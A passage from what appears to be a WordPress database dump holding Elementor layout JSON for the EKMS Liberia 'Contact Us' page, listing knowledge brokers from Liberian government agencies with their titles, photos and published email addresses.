href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24543,3623,'_elementor_edit_mode','builder'),(24544,3623,'_elementor_template_type','wp-page'),(24545,3623,'_elementor_version','3.0.16'),(24546,3623,'_wp_page_template','default'),(24547,3623,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a 